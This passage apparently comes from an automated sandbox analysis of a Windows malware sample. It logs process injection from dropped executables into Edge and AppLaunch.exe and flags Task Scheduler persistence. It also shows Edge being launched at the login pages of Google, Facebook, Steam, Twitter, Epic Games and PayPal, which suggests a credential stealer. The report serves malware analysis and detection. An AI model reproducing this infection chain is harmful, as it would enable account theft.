PID 3868 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3868 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4384 wrote to memory of 2100 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4384 wrote to memory of 2100 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4992 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe
PID 4992 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe
PID 4992 wrote to memory of 3260 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3260 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe

"C:\Users\Admin\AppData\Local\Temp\71eb3b5e7869baa77acaf64d3440c57d9fef40b349b32aceb9bb0d451e060371.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oX2nT08.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mn1ax47.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\GR6Vn25.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1nJ02Id7.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x104,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffdd67b46f8,0x7ffdd67b4708,0x7ffdd67b4718

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wZ1990.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ml67CK.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ml67CK.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3944 -ip 3944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,8768364597170410669,7338875174017337451,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,1818369280764530869,3444074162818531954,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,2030081554748101501,770802937920981015,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,2603108868422151519,3588082286991269282,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,2030081554748101501,770802937920981015,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,488039760645799401,12073486717080831913,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,5118401241585366558,13455160645740923347,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,488039760645799401,12073486717080831913,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,1818369280764530869,3444074162818531954,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,12646720177906114111,12649250219733911196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,5118401241585366558,13455160645740923347,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,2603108868422151519,3588082286991269282,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,12646720177906114111,12649250219733911196,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,8768364597170410669,7338875174017337451,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,3636291597979186051,15702591769461271768,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,3636291597979186051,15702591769461271768,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,17237243772692651098,2981872246627319063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,17237243772692651098,2981872246627319063,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4256 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,14897182962116296524,1256403925712980186,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1

